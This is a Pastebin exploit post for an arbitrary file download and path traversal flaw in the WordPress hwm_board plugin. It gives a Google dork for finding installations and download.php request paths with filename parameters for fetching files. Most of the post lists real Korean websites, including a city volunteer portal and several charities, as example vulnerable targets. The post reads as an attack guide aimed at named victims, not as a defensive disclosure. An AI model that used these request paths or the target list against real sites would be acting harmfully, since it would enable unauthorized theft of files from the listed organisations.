KingSkrupellos

WordPress hwm_board Plugins File Download Vuln

Nov 27th, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.41 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress hwm_board Plugins Korea Arbitrary File Download Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 28/11/2018
  6. # Vendor Homepage : wordpress.org
  7. # Tested On : Windows and Linux
  8. # Category : WebApps
  9. # Version Information : All Current Versions
  10. # Google Dorks : inurl:''/wp-content/plugins/hwm_board/'' site:kr
  11. # Exploit Risk : Medium
  12. # Vulnerability Type :
  13. CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-200 - [ Information Exposure ] - CWE-23 - [ Relative Path Traversal ]
  15. CWE-98 - [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') ]
  16.  
  17. #################################################################################################
  18.  
  19. # Admin Panel Login Path :
  20.  
  21. /wp-login.php
  22.  
  23. # Exploit :
  24.  
  25. /wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]
  26.  
  27. /wp-content/plugins/hwm_board/download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  28.  
  29. TARGETDOMAIN/wp-content/plugins/hwm_board/download.php?filename=
  30. TARGETDOMAIN/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  31.  
  32. #################################################################################################
  33.  
  34. # Example Vulnerable Sites =>
  35.  
  36. [+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/
  37. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  38.  
  39. [+] xn--2e0b78hl7j9vm9rp.xn--3e0b707e/wp-content/plugins/hwm_board/
  40. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  41.  
  42. [+] xn--2e0bm59bpsbcuam01c.xn--3e0b707e/wp-content/plugins/hwm_board/
  43. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  44.  
  45. [+] xn--2e0b050bole3xb963a.xn--3e0b707e/wp-content/plugins/hwm_board/
  46. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  47.  
  48. [+] kodw.or.kr/wp-content/plugins/hwm_board/
  49. download.php?filename=
  50. kodw.or.kr/wp-content/uploads/hwm-board/
  51. [FILENAMEHERE]&fileNa=[FILENAMEHERE]
  52.  
  53. [+] bhchild.kr/wp-content/plugins/hwm_board/
  54. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  55.  
  56. [+] volunteer.seongnam.go.kr/wp-content/plugins/hwm-board/
  57. download.php?filename=[FILENAMEHERE]
  58.  
  59. [+] vol.or.kr/wp-content/plugins/hwm_board/
  60. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  61.  
  62. [+] bhchild.kr/wp-content/plugins/hwm_board/
  63. download.php?filename=[FILENAMEHERE]
  64.  
  65. [+] snse.kr/wp-content/plugins/hwm_board/
  66. download.php?filename=[FILENAMEHERE]
  67.  
  68. [+] kadpi.or.kr/wp-content/plugins/hwm_board/
  69. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  70.  
  71. [+] ddui.org/wp-content/plugins/hwm_board/
  72. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  73.  
  74. [+] snjwyouth.or.kr/wp-content/plugins/hwm_board/
  75. download.php?filename=[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  76.  
  77. [+] jungangbokji.or.kr/wp-content/plugins/hwm_board/
  78. download.php?filename=jungangbokji.or.kr/wp-content/uploads/hwm-board/
  79. [FILENAMEHERE]&fileNa=[FILENAMEHERE]
  80.  
  81. [+] sntp4.or.kr/wp-content/plugins/hwm_board/download.php?filename=
  82. sntp4.or.kr/wp-content/uploads/hwm-board/[FILENAMEHERE]&fileNa=[FILENAMEHERE]
  83.  
  84. #################################################################################################
  85.  
  86. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  87.  
  88. #################################################################################################
Add Comment
Please, Sign In to add comment